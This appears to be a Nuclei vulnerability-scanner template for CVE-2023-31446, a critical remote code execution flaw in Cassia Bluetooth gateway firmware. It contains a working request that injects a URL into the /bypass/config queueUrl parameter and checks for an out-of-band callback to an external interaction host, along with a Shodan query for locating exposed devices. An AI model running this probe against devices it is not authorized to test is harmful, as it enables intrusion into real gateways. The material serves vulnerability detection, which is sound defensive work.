id: CVE-2023-31446 info: name: Cassia Gateway Firmware - Remote Code Execution author: DhiyaneshDk severity: critical description: | In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup. reference: - https://github.com/advisories/GHSA-89ph-wr9x-hcfc - https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution - https://vuldb.com/?id.250210 - https://blog.kscsc.online/cves/202331446/md.html - https://www.cassianetworks.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-31446 epss-score: 0.00066 epss-percentile: 0.27828 cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cassianetworks product: xc1000_firmware shodan-query: html:"Cassia Bluetooth Gateway Management Platform" tags: cve,cve2023,rce,cassia,gateway http: - raw: - | @timeout: 20s GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "dns" - type: regex regex: - "^OK$" # digest: 4a0a00473045022100a8303b0cd10a64a26c1017b52482339440bbe857e22361f8d58e29bed65bc03302205340556a2173736013f81b1ad2bfa44459a577ac9e4ee71bbf10a5f1917725bd:922c64590222798bb761d5b6d8e72950